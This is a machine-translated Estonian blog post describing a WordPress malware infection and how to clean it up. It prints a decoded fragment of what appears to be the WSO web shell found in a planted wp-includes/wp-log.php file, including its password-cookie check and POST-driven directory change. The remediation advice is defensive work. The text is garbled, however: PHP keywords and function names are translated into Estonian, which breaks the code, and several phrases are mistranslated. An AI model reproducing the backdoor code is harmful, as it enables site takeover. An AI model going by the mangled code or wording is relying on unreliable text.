WordPressi viirus - PHP häkkimine - eemaldage WordPressi viirus

Paar päeva tagasi märkasin seade kahtlane kood (viirus / malware) jooksva ajaveebi allikas WordPress. Järgnev PHP kood viibis header.php, enne rida .

[PHP][/ PHP]

Ma ei tea täpselt, kuidas see viirus on kutsutud ja midagi ega kedagi, isegi kui ta ei täpselt, kuid see on nähtamatu külastajad mõjutatud. Pigem tekitab tohutu punkt maha on otsingumootorid (eriti Google) ja seega langus külastajate arvu veebisaite mõjutab.

Detailid teada selle viiruse faili:

1. Eespool nimetatud koodi kohal header.php

2. Tekkimist fail WP-log.php kausta wp-sisaldab.

WP-log

3. Jälgi log.php wp-sisaldab koodi, krüpteeritud:

[PHP][/ PHP]

Dekodeerimiseks kood wp-log.php:

[PHP]

”);
}

funktsioon WSOsetcookie ($ k, $ v) {
$ _COOKIE [$ k] = $ v;
setcookie ($ k, $ v);
}

kui (! tühi ($ auth_pass)) {
if (isset ($ _ POST ['pass']) && (md5 ($ _ POST ['pass']) == $ auth_pass))
WSOsetcookie (md5 ($ _ SERVER ['HTTP_HOST']), $ auth_pass);

if (! isset ($ _ COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])]]) || ($ _COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])]! = $ auth_pass))
wsoLogin ();
}

if (strtolower (substraat (PHP_OS, 0,3)) == “võit”)
$ os = 'võida';
teine
$ os = 'nix';

$ safe_mode = @ini_get ('ohutu_režiim');
kui (! $ safe_mode)
veaaruandlus (0);

$ disable_functions = @ini_get ('keelata_funktsioonid');
$ home_cwd = @getcwd ();
kui (isset ($ _ POST ['c']))
@chdir ($ _ POST ['c']);
$ cwd = @getcwd ();
kui ($ os == 'võida') {
$ home_cwd = str_replace ("\\", "/", $ home_cwd);
$ cwd = str_replace (“\\”, “/”, $ cwd);
}
kui ($ cwd [strlen ($ cwd) -1]! = '/')
$ cwd. = '/';
?>
[/ PHP]

4. Kui lehele pääseb otse juurde numeblog.com/wp-includes/wp-log.php ilmub väljaleht logi. Esmapilgul tundub olevat file Juht.

WORDPRESS ARENG.

1. Kustutage esmalt kood asukohast header.php ja fail WP-log.php pärit wp-sisaldab.

2. Kontrollige faili .htaccess kahtlaste direktiivide kohta. Lubade read või skripti täitmine.

3. Kontrollige teema kausta (/ wp-content /teemad/ Nume_tema). Otsige uusi faile ja olemasolevaid (eriti .php-faile), millel on kahtlased muudatused.

4. Kontrollige kausta pluginS (wp-content/plugins).

5. Kontrollige wp-sisu kahtlastest failidest.

6. Kontrollige kirjutamis- ja faililube. chmod si chown.

MAJANDUSLIKUD ARENDUSED.

1. Esimesena on hea teha varukoopia kõigist ajaveebifailidest ja andmebaasist.

2. Kustutage kaustad wp-admin si wp-sisaldab ja kõik failid . Php saidi juurest. Kui teil on kohandatud .php-faile, on mõistlik neid käsitsi kontrollida.

3. Laadige alla WordPressi praegune versioon ja laadige üles.

4. Kontrollige andmebaasi, kui administraatori auastmega kasutajat pole loodud.

See on peaaegu kõik, mida selle viiruse kohta öelda on, kuid kui teil on täiendusi või kui avastame uusi üksikasju, värskendame seda artiklit hea meelega.

STEALTH SETTINGS - Eemaldage WORDPRESS VIIRUS .

WordPressi viirus - PHP häkkimine - eemaldage WordPressi viirus

Andmeid autor

stealth LP

Asutaja ja toimetaja Kavalus SettingsIn 2006 kuupäeva.
Kogemused Linuxi opsüsteemide (eriti CentOS), Mac OS X, Windows XP> Windows 10 ja WordPress (CMS).

Jäta kommentaar